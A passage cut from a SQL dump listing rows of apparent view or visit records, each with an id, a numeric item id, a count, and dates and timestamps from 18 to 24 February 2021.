08:20:33'),(14305,1610,1,'2021-02-18','2021-02-18 08:23:09'),(14306,1586,1,'2021-02-18','2021-02-18 08:28:36'),(14307,1610,1,'2021-02-18','2021-02-18 08:33:21'),(14308,3096,1,'2021-02-18','2021-02-18 08:35:23'),(14309,1586,1,'2021-02-18','2021-02-18 08:51:23'),(14310,1743,1,'2021-02-18','2021-02-18 08:55:30'),(14311,1612,1,'2021-02-18','2021-02-18 09:33:30'),(14312,2457,1,'2021-02-18','2021-02-18 10:10:36'),(14313,1614,1,'2021-02-18','2021-02-18 10:10:55'),(14314,1614,1,'2021-02-18','2021-02-18 10:11:41'),(14315,570,1,'2021-02-18','2021-02-18 10:13:14'),(14316,3243,1,'2021-02-18','2021-02-18 10:13:40'),(14317,3090,1,'2021-02-18','2021-02-18 10:22:29'),(14318,2457,1,'2021-02-18','2021-02-18 10:29:00'),(14319,2156,1,'2021-02-18','2021-02-18 10:44:59'),(14320,2410,1,'2021-02-18','2021-02-18 11:23:40'),(14321,80,1,'2021-02-18','2021-02-18 11:32:36'),(14322,2457,1,'2021-02-18','2021-02-18 11:33:34'),(14323,2769,1,'2021-02-18','2021-02-18 11:34:36'),(14324,2775,1,'2021-02-18','2021-02-18 11:34:47'),(14325,1614,1,'2021-02-18','2021-02-18 11:38:20'),(14326,76,1,'2021-02-18','2021-02-18 11:39:56'),(14327,1614,1,'2021-02-18','2021-02-18 11:41:03'),(14328,468,1,'2021-02-18','2021-02-18 11:46:06'),(14329,1586,1,'2021-02-18','2021-02-18 11:47:31'),(14330,1614,1,'2021-02-18','2021-02-18 11:47:53'),(14331,2769,1,'2021-02-18','2021-02-18 11:48:15'),(14332,1586,1,'2021-02-18','2021-02-18 11:50:15'),(14333,68,1,'2021-02-18','2021-02-18 12:02:14'),(14334,1741,1,'2021-02-18','2021-02-18 12:05:07'),(14335,1612,1,'2021-02-18','2021-02-18 12:17:16'),(14336,3498,1,'2021-02-18','2021-02-18 12:30:45'),(14337,1614,1,'2021-02-18','2021-02-18 12:33:32'),(14338,2457,1,'2021-02-18','2021-02-18 12:34:44'),(14339,2558,1,'2021-02-18','2021-02-18 12:44:20'),(14340,481,1,'2021-02-18','2021-02-18 12:44:23'),(14341,1594,1,'2021-02-18','2021-02-18 12:47:19'),(14342,1594,1,'2021-02-18','2021-02-18 12:48:11'),(14343,1586,1,'2021-02-18','2021-02-18 12:54:17'),(14344,1739,1,'2021-02-18','2021-02-18 12:54:28'),(14345,1598,1,'2021-02-18','2021-02-18 13:23:36'),(14346,472,1,'2021-02-18','2021-02-18 13:24:22'),(14347,1614,1,'2021-02-18','2021-02-18 13:30:54'),(14348,1586,1,'2021-02-18','2021-02-18 13:35:22'),(14349,1586,1,'2021-02-18','2021-02-18 13:38:00'),(14350,1870,1,'2021-02-18','2021-02-18 13:54:23'),(14351,2557,1,'2021-02-18','2021-02-18 13:55:58'),(14352,89,1,'2021-02-18','2021-02-18 13:59:44'),(14353,3083,1,'2021-02-18','2021-02-18 13:59:56'),(14354,2617,1,'2021-02-18','2021-02-18 14:22:12'),(14355,1594,1,'2021-02-18','2021-02-18 14:34:46'),(14356,2911,1,'2021-02-18','2021-02-18 14:47:53'),(14357,1608,1,'2021-02-18','2021-02-18 15:05:23'),(14358,3104,1,'2021-02-18','2021-02-18 15:08:18'),(14359,1586,1,'2021-02-18','2021-02-18 15:11:57'),(14360,2658,1,'2021-02-18','2021-02-18 15:35:00'),(14361,2751,1,'2021-02-18','2021-02-18 15:38:22'),(14362,2751,1,'2021-02-18','2021-02-18 15:45:06'),(14363,2297,1,'2021-02-18','2021-02-18 16:06:00'),(14364,3005,1,'2021-02-18','2021-02-18 16:42:05'),(14365,2159,1,'2021-02-18','2021-02-18 17:05:40'),(14366,2911,1,'2021-02-18','2021-02-18 19:11:51'),(14367,2911,1,'2021-02-18','2021-02-18 19:11:56'),(14368,1604,1,'2021-02-18','2021-02-18 21:22:27'),(14369,1600,1,'2021-02-19','2021-02-19 00:39:37'),(14370,472,1,'2021-02-19','2021-02-19 02:09:09'),(14371,84,1,'2021-02-19','2021-02-19 04:13:27'),(14372,1586,1,'2021-02-19','2021-02-19 04:31:17'),(14373,1709,1,'2021-02-19','2021-02-19 04:45:22'),(14374,76,1,'2021-02-19','2021-02-19 05:40:21'),(14375,2309,1,'2021-02-19','2021-02-19 06:40:07'),(14376,1612,1,'2021-02-19','2021-02-19 07:57:27'),(14377,1718,1,'2021-02-19','2021-02-19 08:21:08'),(14378,470,1,'2021-02-19','2021-02-19 08:40:57'),(14379,1586,1,'2021-02-19','2021-02-19 10:13:08'),(14380,1600,1,'2021-02-19','2021-02-19 10:15:23'),(14381,87,1,'2021-02-19','2021-02-19 10:27:25'),(14382,1582,1,'2021-02-19','2021-02-19 10:31:20'),(14383,1586,1,'2021-02-19','2021-02-19 10:43:52'),(14384,1612,1,'2021-02-19','2021-02-19 10:45:18'),(14385,1600,1,'2021-02-19','2021-02-19 11:25:01'),(14386,1600,1,'2021-02-19','2021-02-19 11:25:06'),(14387,1600,1,'2021-02-19','2021-02-19 11:25:26'),(14388,1594,1,'2021-02-19','2021-02-19 11:32:11'),(14389,1594,1,'2021-02-19','2021-02-19 11:33:51'),(14390,1594,1,'2021-02-19','2021-02-19 11:34:29'),(14391,1606,1,'2021-02-19','2021-02-19 13:08:16'),(14392,89,1,'2021-02-19','2021-02-19 14:34:07'),(14393,1586,1,'2021-02-19','2021-02-19 14:39:57'),(14394,76,1,'2021-02-19','2021-02-19 14:40:43'),(14395,1586,1,'2021-02-19','2021-02-19 14:41:33'),(14396,3005,1,'2021-02-19','2021-02-19 14:46:08'),(14397,1614,1,'2021-02-19','2021-02-19 14:46:57'),(14398,87,1,'2021-02-19','2021-02-19 14:47:43'),(14399,473,1,'2021-02-19','2021-02-19 14:48:45'),(14400,87,1,'2021-02-19','2021-02-19 14:48:56'),(14401,1586,1,'2021-02-19','2021-02-19 14:49:22'),(14402,68,1,'2021-02-19','2021-02-19 14:49:53'),(14403,474,1,'2021-02-19','2021-02-19 14:56:48'),(14404,1586,1,'2021-02-19','2021-02-19 14:58:05'),(14405,470,1,'2021-02-19','2021-02-19 15:03:25'),(14406,91,1,'2021-02-19','2021-02-19 15:07:07'),(14407,76,1,'2021-02-19','2021-02-19 15:08:59'),(14408,91,1,'2021-02-19','2021-02-19 15:12:16'),(14409,91,1,'2021-02-19','2021-02-19 15:14:59'),(14410,3097,1,'2021-02-19','2021-02-19 15:17:09'),(14411,68,1,'2021-02-19','2021-02-19 15:56:24'),(14412,2769,1,'2021-02-19','2021-02-19 16:15:26'),(14413,1604,1,'2021-02-19','2021-02-19 16:25:23'),(14414,1586,1,'2021-02-19','2021-02-19 16:29:27'),(14415,335,1,'2021-02-19','2021-02-19 16:29:55'),(14416,1614,1,'2021-02-19','2021-02-19 19:19:40'),(14417,1588,1,'2021-02-19','2021-02-19 20:55:26'),(14418,2178,1,'2021-02-19','2021-02-19 23:02:41'),(14419,1586,1,'2021-02-19','2021-02-19 23:25:34'),(14420,3079,1,'2021-02-20','2021-02-20 02:51:01'),(14421,1608,1,'2021-02-20','2021-02-20 03:39:33'),(14422,91,1,'2021-02-20','2021-02-20 03:40:39'),(14423,1608,1,'2021-02-20','2021-02-20 03:41:10'),(14424,2309,1,'2021-02-20','2021-02-20 03:43:22'),(14425,2309,1,'2021-02-20','2021-02-20 04:34:22'),(14426,1600,1,'2021-02-20','2021-02-20 04:56:48'),(14427,1770,1,'2021-02-20','2021-02-20 05:29:48'),(14428,110,1,'2021-02-20','2021-02-20 07:39:50'),(14429,2309,1,'2021-02-20','2021-02-20 08:58:30'),(14430,1586,1,'2021-02-20','2021-02-20 10:08:18'),(14431,1586,1,'2021-02-20','2021-02-20 10:16:05'),(14432,76,1,'2021-02-20','2021-02-20 10:17:40'),(14433,1586,1,'2021-02-20','2021-02-20 10:18:00'),(14434,1586,1,'2021-02-20','2021-02-20 10:56:29'),(14435,2297,1,'2021-02-20','2021-02-20 12:00:12'),(14436,1586,1,'2021-02-20','2021-02-20 12:35:20'),(14437,2309,1,'2021-02-20','2021-02-20 13:57:57'),(14438,1586,1,'2021-02-20','2021-02-20 14:13:37'),(14439,1586,1,'2021-02-20','2021-02-20 14:14:28'),(14440,1586,1,'2021-02-20','2021-02-20 14:18:07'),(14441,1586,1,'2021-02-20','2021-02-20 14:19:08'),(14442,1586,1,'2021-02-20','2021-02-20 14:43:56'),(14443,3117,1,'2021-02-20','2021-02-20 15:12:28'),(14444,1602,1,'2021-02-20','2021-02-20 18:06:04'),(14445,1772,1,'2021-02-20','2021-02-20 18:06:15'),(14446,80,1,'2021-02-20','2021-02-20 18:09:37'),(14447,1582,1,'2021-02-20','2021-02-20 18:12:02'),(14448,80,1,'2021-02-20','2021-02-20 18:13:18'),(14449,1586,1,'2021-02-20','2021-02-20 19:36:12'),(14450,1586,1,'2021-02-20','2021-02-20 19:36:21'),(14451,1586,1,'2021-02-20','2021-02-20 19:37:01'),(14452,1586,1,'2021-02-20','2021-02-20 19:43:34'),(14453,1588,1,'2021-02-20','2021-02-20 19:46:12'),(14454,3102,1,'2021-02-20','2021-02-20 20:41:17'),(14455,1586,1,'2021-02-20','2021-02-20 22:12:51'),(14456,1586,1,'2021-02-20','2021-02-20 22:14:19'),(14457,3107,1,'2021-02-20','2021-02-20 22:21:44'),(14458,1612,1,'2021-02-21','2021-02-21 00:22:50'),(14459,2063,1,'2021-02-21','2021-02-21 02:15:23'),(14460,2154,1,'2021-02-21','2021-02-21 04:25:43'),(14461,467,1,'2021-02-21','2021-02-21 06:26:40'),(14462,478,1,'2021-02-21','2021-02-21 09:03:50'),(14463,3109,1,'2021-02-21','2021-02-21 09:14:33'),(14464,1586,1,'2021-02-21','2021-02-21 09:18:14'),(14465,2609,1,'2021-02-21','2021-02-21 09:23:55'),(14466,467,1,'2021-02-21','2021-02-21 09:23:58'),(14467,1600,1,'2021-02-21','2021-02-21 09:25:41'),(14468,91,1,'2021-02-21','2021-02-21 09:35:22'),(14469,1745,1,'2021-02-21','2021-02-21 09:35:55'),(14470,91,1,'2021-02-21','2021-02-21 09:40:42'),(14471,1600,1,'2021-02-21','2021-02-21 09:40:51'),(14472,1600,1,'2021-02-21','2021-02-21 09:48:24'),(14473,91,1,'2021-02-21','2021-02-21 10:03:44'),(14474,3229,1,'2021-02-21','2021-02-21 10:25:25'),(14475,1600,1,'2021-02-21','2021-02-21 10:54:17'),(14476,2309,1,'2021-02-21','2021-02-21 11:14:18'),(14477,1586,1,'2021-02-21','2021-02-21 11:24:39'),(14478,3245,1,'2021-02-21','2021-02-21 11:25:23'),(14479,1718,1,'2021-02-21','2021-02-21 11:44:50'),(14480,1586,1,'2021-02-21','2021-02-21 12:51:45'),(14481,1604,1,'2021-02-21','2021-02-21 13:15:24'),(14482,2159,1,'2021-02-21','2021-02-21 13:35:36'),(14483,1768,1,'2021-02-21','2021-02-21 13:35:40'),(14484,1604,1,'2021-02-21','2021-02-21 13:36:23'),(14485,1604,1,'2021-02-21','2021-02-21 13:36:40'),(14486,2309,1,'2021-02-21','2021-02-21 13:45:44'),(14487,1600,1,'2021-02-21','2021-02-21 14:05:48'),(14488,1586,1,'2021-02-21','2021-02-21 14:15:54'),(14489,1604,1,'2021-02-21','2021-02-21 14:16:03'),(14490,2159,1,'2021-02-21','2021-02-21 14:26:27'),(14491,570,1,'2021-02-21','2021-02-21 14:46:34'),(14492,1582,1,'2021-02-21','2021-02-21 14:57:09'),(14493,1602,1,'2021-02-21','2021-02-21 15:06:49'),(14494,2609,1,'2021-02-21','2021-02-21 15:16:46'),(14495,1586,1,'2021-02-21','2021-02-21 15:27:12'),(14496,470,1,'2021-02-21','2021-02-21 15:47:28'),(14497,2769,1,'2021-02-21','2021-02-21 15:57:44'),(14498,1582,1,'2021-02-21','2021-02-21 16:05:26'),(14499,1586,1,'2021-02-21','2021-02-21 16:29:12'),(14500,1586,1,'2021-02-21','2021-02-21 16:31:46'),(14501,1588,1,'2021-02-21','2021-02-21 16:47:38'),(14502,3253,1,'2021-02-21','2021-02-21 16:55:39'),(14503,1610,1,'2021-02-21','2021-02-21 17:18:18'),(14504,1600,1,'2021-02-21','2021-02-21 17:27:54'),(14505,2813,1,'2021-02-21','2021-02-21 17:52:14'),(14506,2309,1,'2021-02-21','2021-02-21 18:12:29'),(14507,2309,1,'2021-02-21','2021-02-21 18:12:46'),(14508,1586,1,'2021-02-21','2021-02-21 18:46:11'),(14509,1586,1,'2021-02-21','2021-02-21 18:46:56'),(14510,1586,1,'2021-02-21','2021-02-21 18:47:15'),(14511,570,1,'2021-02-21','2021-02-21 18:49:11'),(14512,3247,1,'2021-02-21','2021-02-21 19:02:07'),(14513,478,1,'2021-02-21','2021-02-21 19:08:56'),(14514,476,1,'2021-02-21','2021-02-21 19:20:16'),(14515,91,1,'2021-02-21','2021-02-21 19:29:04'),(14516,1600,1,'2021-02-21','2021-02-21 19:38:46'),(14517,3257,1,'2021-02-21','2021-02-21 19:48:36'),(14518,1594,1,'2021-02-21','2021-02-21 19:58:38'),(14519,1586,1,'2021-02-21','2021-02-21 20:06:03'),(14520,474,1,'2021-02-21','2021-02-21 20:06:49'),(14521,80,1,'2021-02-21','2021-02-21 20:09:46'),(14522,1586,1,'2021-02-21','2021-02-21 20:28:27'),(14523,1718,1,'2021-02-21','2021-02-21 20:38:26'),(14524,1600,1,'2021-02-21','2021-02-21 21:29:14'),(14525,1600,1,'2021-02-21','2021-02-21 21:29:45'),(14526,1586,1,'2021-02-21','2021-02-21 21:33:23'),(14527,2309,1,'2021-02-21','2021-02-21 21:46:34'),(14528,2457,1,'2021-02-21','2021-02-21 22:08:04'),(14529,80,1,'2021-02-21','2021-02-21 22:13:26'),(14530,1596,1,'2021-02-21','2021-02-21 22:24:17'),(14531,2159,1,'2021-02-21','2021-02-21 22:39:10'),(14532,1604,1,'2021-02-21','2021-02-21 23:19:50'),(14533,1596,1,'2021-02-21','2021-02-21 23:28:22'),(14534,1582,1,'2021-02-21','2021-02-21 23:29:53'),(14535,1596,1,'2021-02-21','2021-02-21 23:33:01'),(14536,1596,1,'2021-02-21','2021-02-21 23:33:25'),(14537,91,1,'2021-02-21','2021-02-21 23:59:27'),(14538,3127,1,'2021-02-22','2021-02-22 00:07:28'),(14539,1602,1,'2021-02-22','2021-02-22 00:29:47'),(14540,1582,1,'2021-02-22','2021-02-22 00:31:26'),(14541,2609,1,'2021-02-22','2021-02-22 00:40:05'),(14542,1586,1,'2021-02-22','2021-02-22 00:49:45'),(14543,2769,1,'2021-02-22','2021-02-22 00:59:39'),(14544,1718,1,'2021-02-22','2021-02-22 01:09:55'),(14545,1588,1,'2021-02-22','2021-02-22 01:29:55'),(14546,2751,1,'2021-02-22','2021-02-22 01:39:56'),(14547,468,1,'2021-02-22','2021-02-22 01:41:34'),(14548,1588,1,'2021-02-22','2021-02-22 01:49:58'),(14549,3243,1,'2021-02-22','2021-02-22 02:00:18'),(14550,3280,1,'2021-02-22','2021-02-22 02:30:19'),(14551,2410,1,'2021-02-22','2021-02-22 03:10:35'),(14552,1586,1,'2021-02-22','2021-02-22 03:27:14'),(14553,470,1,'2021-02-22','2021-02-22 03:30:39'),(14554,570,1,'2021-02-22','2021-02-22 03:40:55'),(14555,3489,1,'2021-02-22','2021-02-22 03:54:56'),(14556,2420,1,'2021-02-22','2021-02-22 04:10:36'),(14557,91,1,'2021-02-22','2021-02-22 04:20:37'),(14558,3257,1,'2021-02-22','2021-02-22 04:40:25'),(14559,1600,1,'2021-02-22','2021-02-22 04:50:40'),(14560,2063,1,'2021-02-22','2021-02-22 05:03:06'),(14561,80,1,'2021-02-22','2021-02-22 05:10:16'),(14562,1594,1,'2021-02-22','2021-02-22 05:20:25'),(14563,2309,1,'2021-02-22','2021-02-22 05:30:26'),(14564,1586,1,'2021-02-22','2021-02-22 05:40:26'),(14565,1718,1,'2021-02-22','2021-02-22 06:10:37'),(14566,3117,1,'2021-02-22','2021-02-22 06:17:45'),(14567,1749,1,'2021-02-22','2021-02-22 06:20:54'),(14568,2558,1,'2021-02-22','2021-02-22 06:31:15'),(14569,1586,1,'2021-02-22','2021-02-22 06:33:06'),(14570,3240,1,'2021-02-22','2021-02-22 07:11:02'),(14571,2159,1,'2021-02-22','2021-02-22 07:21:36'),(14572,1600,1,'2021-02-22','2021-02-22 07:41:47'),(14573,2159,1,'2021-02-22','2021-02-22 07:51:50'),(14574,1602,1,'2021-02-22','2021-02-22 08:01:58'),(14575,1614,1,'2021-02-22','2021-02-22 08:11:56'),(14576,3257,1,'2021-02-22','2021-02-22 08:22:16'),(14577,1586,1,'2021-02-22','2021-02-22 08:37:56'),(14578,1604,1,'2021-02-22','2021-02-22 08:42:55'),(14579,570,1,'2021-02-22','2021-02-22 08:52:51'),(14580,1582,1,'2021-02-22','2021-02-22 09:02:51'),(14581,1586,1,'2021-02-22','2021-02-22 09:26:55'),(14582,1582,1,'2021-02-22','2021-02-22 09:35:22'),(14583,1596,1,'2021-02-22','2021-02-22 09:45:34'),(14584,2769,1,'2021-02-22','2021-02-22 09:52:59'),(14585,1596,1,'2021-02-22','2021-02-22 10:14:00'),(14586,2813,1,'2021-02-22','2021-02-22 10:19:21'),(14587,1586,1,'2021-02-22','2021-02-22 10:23:37'),(14588,2609,1,'2021-02-22','2021-02-22 10:27:40'),(14589,1588,1,'2021-02-22','2021-02-22 10:42:55'),(14590,2751,1,'2021-02-22','2021-02-22 11:03:17'),(14591,1739,1,'2021-02-22','2021-02-22 11:13:06'),(14592,479,1,'2021-02-22','2021-02-22 11:22:59'),(14593,2769,1,'2021-02-22','2021-02-22 11:25:55'),(14594,2309,1,'2021-02-22','2021-02-22 11:35:21'),(14595,80,1,'2021-02-22','2021-02-22 11:40:09'),(14596,1586,1,'2021-02-22','2021-02-22 11:42:08'),(14597,76,1,'2021-02-22','2021-02-22 11:42:30'),(14598,1614,1,'2021-02-22','2021-02-22 11:42:49'),(14599,1586,1,'2021-02-22','2021-02-22 11:42:52'),(14600,335,1,'2021-02-22','2021-02-22 11:44:50'),(14601,91,1,'2021-02-22','2021-02-22 11:45:04'),(14602,3486,1,'2021-02-22','2021-02-22 12:03:05'),(14603,1592,1,'2021-02-22','2021-02-22 12:14:09'),(14604,2558,1,'2021-02-22','2021-02-22 12:23:16'),(14605,1610,1,'2021-02-22','2021-02-22 12:33:12'),(14606,1586,1,'2021-02-22','2021-02-22 12:34:29'),(14607,2609,1,'2021-02-22','2021-02-22 12:43:15'),(14608,1596,1,'2021-02-22','2021-02-22 12:50:46'),(14609,1596,1,'2021-02-22','2021-02-22 12:51:19'),(14610,1592,1,'2021-02-22','2021-02-22 12:51:59'),(14611,1588,1,'2021-02-22','2021-02-22 12:52:39'),(14612,3489,1,'2021-02-22','2021-02-22 12:59:15'),(14613,570,1,'2021-02-22','2021-02-22 13:03:25'),(14614,470,1,'2021-02-22','2021-02-22 13:13:25'),(14615,1600,1,'2021-02-22','2021-02-22 13:54:18'),(14616,1596,1,'2021-02-22','2021-02-22 14:00:53'),(14617,3290,1,'2021-02-22','2021-02-22 14:11:10'),(14618,1586,1,'2021-02-22','2021-02-22 14:21:20'),(14619,80,1,'2021-02-22','2021-02-22 14:31:50'),(14620,2309,1,'2021-02-22','2021-02-22 14:34:06'),(14621,80,1,'2021-02-22','2021-02-22 14:34:10'),(14622,1586,1,'2021-02-22','2021-02-22 14:39:06'),(14623,3104,1,'2021-02-22','2021-02-22 14:47:33'),(14624,1596,1,'2021-02-22','2021-02-22 15:02:23'),(14625,1586,1,'2021-02-22','2021-02-22 15:14:30'),(14626,1588,1,'2021-02-22','2021-02-22 15:21:36'),(14627,80,1,'2021-02-22','2021-02-22 15:22:42'),(14628,1588,1,'2021-02-22','2021-02-22 15:22:55'),(14629,1718,1,'2021-02-22','2021-02-22 15:24:37'),(14630,1596,1,'2021-02-22','2021-02-22 15:27:22'),(14631,1596,1,'2021-02-22','2021-02-22 15:27:41'),(14632,1594,1,'2021-02-22','2021-02-22 15:34:52'),(14633,80,1,'2021-02-22','2021-02-22 15:36:37'),(14634,1586,1,'2021-02-22','2021-02-22 15:49:16'),(14635,2558,1,'2021-02-22','2021-02-22 16:05:08'),(14636,1586,1,'2021-02-22','2021-02-22 16:06:07'),(14637,68,1,'2021-02-22','2021-02-22 16:06:28'),(14638,80,1,'2021-02-22','2021-02-22 16:06:40'),(14639,108,1,'2021-02-22','2021-02-22 16:06:45'),(14640,108,1,'2021-02-22','2021-02-22 16:07:47'),(14641,80,1,'2021-02-22','2021-02-22 16:07:49'),(14642,68,1,'2021-02-22','2021-02-22 16:07:50'),(14643,1586,1,'2021-02-22','2021-02-22 16:07:52'),(14644,2420,1,'2021-02-22','2021-02-22 16:35:18'),(14645,2309,1,'2021-02-22','2021-02-22 16:38:20'),(14646,2813,1,'2021-02-22','2021-02-22 16:50:08'),(14647,2309,1,'2021-02-22','2021-02-22 16:55:20'),(14648,2159,1,'2021-02-22','2021-02-22 17:05:31'),(14649,1600,1,'2021-02-22','2021-02-22 17:25:44'),(14650,1600,1,'2021-02-22','2021-02-22 17:31:09'),(14651,1604,1,'2021-02-22','2021-02-22 17:55:15'),(14652,1582,1,'2021-02-22','2021-02-22 18:15:12'),(14653,1586,1,'2021-02-22','2021-02-22 18:29:50'),(14654,1586,1,'2021-02-22','2021-02-22 18:30:43'),(14655,1586,1,'2021-02-22','2021-02-22 18:32:59'),(14656,1586,1,'2021-02-22','2021-02-22 18:35:07'),(14657,2956,1,'2021-02-22','2021-02-22 18:44:08'),(14658,2904,1,'2021-02-22','2021-02-22 18:44:41'),(14659,2769,1,'2021-02-22','2021-02-22 18:45:14'),(14660,1600,1,'2021-02-22','2021-02-22 18:47:39'),(14661,1586,1,'2021-02-22','2021-02-22 18:55:15'),(14662,1602,1,'2021-02-22','2021-02-22 18:55:28'),(14663,1602,1,'2021-02-22','2021-02-22 19:16:53'),(14664,2609,1,'2021-02-22','2021-02-22 19:47:51'),(14665,2309,1,'2021-02-22','2021-02-22 20:00:19'),(14666,2813,1,'2021-02-22','2021-02-22 20:09:47'),(14667,1586,1,'2021-02-22','2021-02-22 20:14:26'),(14668,1586,1,'2021-02-22','2021-02-22 20:18:30'),(14669,2297,1,'2021-02-22','2021-02-22 20:33:01'),(14670,1588,1,'2021-02-22','2021-02-22 21:21:54'),(14671,91,1,'2021-02-22','2021-02-22 21:41:02'),(14672,2309,1,'2021-02-22','2021-02-22 21:56:53'),(14673,72,1,'2021-02-22','2021-02-22 22:00:05'),(14674,1600,1,'2021-02-22','2021-02-22 22:04:34'),(14675,2751,1,'2021-02-22','2021-02-22 22:18:43'),(14676,2309,1,'2021-02-22','2021-02-22 22:18:44'),(14677,2309,1,'2021-02-22','2021-02-22 22:18:53'),(14678,2309,1,'2021-02-22','2021-02-22 22:18:55'),(14679,1588,1,'2021-02-22','2021-02-22 22:37:42'),(14680,1582,1,'2021-02-22','2021-02-22 23:15:36'),(14681,1718,1,'2021-02-22','2021-02-22 23:34:32'),(14682,1745,1,'2021-02-22','2021-02-22 23:52:12'),(14683,2609,1,'2021-02-22','2021-02-22 23:53:37'),(14684,2410,1,'2021-02-23','2021-02-23 00:31:41'),(14685,470,1,'2021-02-23','2021-02-23 00:50:18'),(14686,3257,1,'2021-02-23','2021-02-23 01:09:14'),(14687,1600,1,'2021-02-23','2021-02-23 01:28:12'),(14688,2309,1,'2021-02-23','2021-02-23 02:25:14'),(14689,3127,1,'2021-02-23','2021-02-23 02:59:04'),(14690,2159,1,'2021-02-23','2021-02-23 02:59:57'),(14691,1586,1,'2021-02-23','2021-02-23 04:00:05'),(14692,1718,1,'2021-02-23','2021-02-23 04:18:44'),(14693,2309,1,'2021-02-23','2021-02-23 04:37:42'),(14694,2159,1,'2021-02-23','2021-02-23 04:56:38'),(14695,1604,1,'2021-02-23','2021-02-23 05:15:36'),(14696,1600,1,'2021-02-23','2021-02-23 05:34:32'),(14697,1602,1,'2021-02-23','2021-02-23 05:53:28'),(14698,2159,1,'2021-02-23','2021-02-23 06:12:25'),(14699,3226,1,'2021-02-23','2021-02-23 06:25:42'),(14700,570,1,'2021-02-23','2021-02-23 06:31:21'),(14701,1586,1,'2021-02-23','2021-02-23 06:50:26'),(14702,2769,1,'2021-02-23','2021-02-23 07:09:16'),(14703,1582,1,'2021-02-23','2021-02-23 07:28:15'),(14704,3261,1,'2021-02-23','2021-02-23 07:38:33'),(14705,1707,1,'2021-02-23','2021-02-23 07:56:38'),(14706,2558,1,'2021-02-23','2021-02-23 08:15:06'),(14707,1776,1,'2021-02-23','2021-02-23 08:20:49'),(14708,2609,1,'2021-02-23','2021-02-23 08:44:11'),(14709,1614,1,'2021-02-23','2021-02-23 09:03:24'),(14710,1586,1,'2021-02-23','2021-02-23 09:04:03'),(14711,2617,1,'2021-02-23','2021-02-23 09:04:55'),(14712,1586,1,'2021-02-23','2021-02-23 09:47:28'),(14713,570,1,'2021-02-23','2021-02-23 09:47:48'),(14714,74,1,'2021-02-23','2021-02-23 09:53:19'),(14715,91,1,'2021-02-23','2021-02-23 10:27:00'),(14716,80,1,'2021-02-23','2021-02-23 10:30:26'),(14717,1586,1,'2021-02-23','2021-02-23 10:34:13'),(14718,91,1,'2021-02-23','2021-02-23 10:38:03'),(14719,1600,1,'2021-02-23','2021-02-23 10:55:00'),(14720,1600,1,'2021-02-23','2021-02-23 10:55:05'),(14721,1600,1,'2021-02-23','2021-02-23 10:55:53'),(14722,2309,1,'2021-02-23','2021-02-23 11:08:24'),(14723,1594,1,'2021-02-23','2021-02-23 11:09:12'),(14724,1588,1,'2021-02-23','2021-02-23 12:01:09'),(14725,1588,1,'2021-02-23','2021-02-23 12:23:20'),(14726,76,1,'2021-02-23','2021-02-23 12:25:50'),(14727,72,1,'2021-02-23','2021-02-23 13:50:58'),(14728,1707,1,'2021-02-23','2021-02-23 14:43:44'),(14729,1586,1,'2021-02-23','2021-02-23 14:48:45'),(14730,2457,1,'2021-02-23','2021-02-23 14:52:40'),(14731,488,1,'2021-02-23','2021-02-23 14:53:01'),(14732,1586,1,'2021-02-23','2021-02-23 14:53:10'),(14733,3055,1,'2021-02-23','2021-02-23 15:51:08'),(14734,1586,1,'2021-02-23','2021-02-23 15:56:25'),(14735,84,1,'2021-02-23','2021-02-23 16:04:43'),(14736,1614,1,'2021-02-23','2021-02-23 16:40:16'),(14737,84,1,'2021-02-23','2021-02-23 16:42:08'),(14738,1877,1,'2021-02-23','2021-02-23 16:42:21'),(14739,1614,1,'2021-02-23','2021-02-23 17:07:00'),(14740,1586,1,'2021-02-23','2021-02-23 17:07:25'),(14741,1586,1,'2021-02-23','2021-02-23 17:07:55'),(14742,1586,1,'2021-02-23','2021-02-23 17:09:16'),(14743,2490,1,'2021-02-23','2021-02-23 17:13:43'),(14744,2293,1,'2021-02-23','2021-02-23 17:14:09'),(14745,2490,1,'2021-02-23','2021-02-23 17:14:20'),(14746,2490,1,'2021-02-23','2021-02-23 17:14:21'),(14747,80,1,'2021-02-23','2021-02-23 17:20:27'),(14748,3261,1,'2021-02-23','2021-02-23 17:47:54'),(14749,2704,1,'2021-02-23','2021-02-23 17:57:09'),(14750,2704,1,'2021-02-23','2021-02-23 17:57:41'),(14751,3092,1,'2021-02-23','2021-02-23 18:46:25'),(14752,3041,1,'2021-02-23','2021-02-23 19:17:13'),(14753,3489,1,'2021-02-23','2021-02-23 20:36:15'),(14754,1870,1,'2021-02-23','2021-02-23 21:05:39'),(14755,1598,1,'2021-02-23','2021-02-23 21:09:16'),(14756,1598,1,'2021-02-23','2021-02-23 21:09:27'),(14757,1598,1,'2021-02-23','2021-02-23 21:11:06'),(14758,1596,1,'2021-02-23','2021-02-23 21:55:18'),(14759,1596,1,'2021-02-23','2021-02-23 21:56:05'),(14760,2748,1,'2021-02-23','2021-02-23 22:25:53'),(14761,91,1,'2021-02-23','2021-02-23 22:52:57'),(14762,1586,1,'2021-02-23','2021-02-23 23:03:34'),(14763,2617,1,'2021-02-23','2021-02-23 23:04:05'),(14764,2293,1,'2021-02-24','2021-02-24 00:26:43'),(14765,3006,1,'2021-02-24','2021-02-24 02:30:45'),(14766,2159,1,'2021-02-24','2021-02-24 03:40:06'),(14767,1870,1,'2021-02-24','2021-02-24 03:48:19'),(14768,2748,1,'2021-02-24','2021-02-24 04:08:30'),(14769,2956,1,'2021-02-24','2021-02-24 04:48:48'),(14770,487,1,'2021-02-24','2021-02-24 04:58:50'),(14771,2159,1,'2021-02-24','2021-02-24 05:06:06'),(14772,3482,1,'2021-02-24','2021-02-24 06:04:00'),(14773,1586,1,'2021-02-24','2021-02-24 06:57:23'),(14774,1586,1,'2021-02-24','2021-02-24 06:58:17'),(14775,2956,1,'2021-02-24','2021-02-24 07:13:17'),(14776,3083,1,'2021-02-24','2021-02-24 08:12:57'),(14777,3083,1,'2021-02-24','2021-02-24 08:13:15'),(14778,3083,1,'2021-02-24','2021-02-24 08:13:16'),(14779,487,1,'2021-02-24','2021-02-24 08:30:28'),(14780,76,1,'2021-02-24','2021-02-24 09:13:30'),(14781,1614,1,'2021-02-24','2021-02-24 09:14:53'),(14782,1582,1,'2021-02-24','2021-02-24 09:14:54'),(14783,3045,1,'2021-02-24','2021-02-24 09:45:19'),(14784,1614,1,'2021-02-24','2021-02-24 09:50:59'),(14785,68,1,'2021-02-24','2021-02-24 10:14:10'),(14786,1870,1,'2021-02-24','2021-02-24 10:20:17'),(14787,91,1,'2021-02-24','2021-02-24 10:22:49'),(14788,1747,1,'2021-02-24','2021-02-24 10:23:09'),(14789,91,1,'2021-02-24','2021-02-24 10:23:44'),(14790,89,1,'2021-02-24','2021-02-24 